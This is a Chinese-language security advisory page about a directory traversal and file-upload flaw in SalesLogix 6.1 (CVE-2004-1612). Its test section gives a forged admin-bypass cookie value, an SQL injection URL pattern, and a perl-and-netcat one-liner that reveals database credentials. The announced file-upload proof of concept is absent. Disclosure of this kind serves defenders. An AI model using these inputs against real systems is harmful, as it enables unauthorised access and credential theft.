当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Best Software SalesLogix ProcessQueueFile文件上传漏洞

信息来源:Carl      发表日期:2013-09-03 17:42:00

SalesLogix是客户关系管理解决方案。

 

Best Software SalesLogix 6.1存在目录遍历漏洞,远程攻击者通过ProcessQueueFile请求内的"..",利用此漏洞可上传任意文件。

 

BUGTRAQ-ID:11450

CVE-ID:2004-1612

受影响系统:

SalesLogix SalesLogix 6.1

 

测试方法:

警  告!以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Admin authentication bypass cookie value:

slxweb=user=Admin|teams=ADMIN!|usertype=Administrator|

 

SQL Injection example:

http://www.example.com/scripts/slxweb.dll/view?name=coninfo&id=[SQL]

 

Revealing the database username and password:

perl -e \'print "\\x0"x10 . "\\x20" . "\\x0"x3 .

"GetConnection\\x0SALESLOGIX_SERVER\\x0"\' | netcat 1.2.3.4

1707

 

Finally the following script has been provided as a proof of concept for the file upload issue:

解决办法:安装厂商补丁

 

厂商补丁:

 

SalesLogix

----------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

 

http://www.saleslogix.com

 

参考信息:

http://xforce.iss.net/xforce/xfdb/17765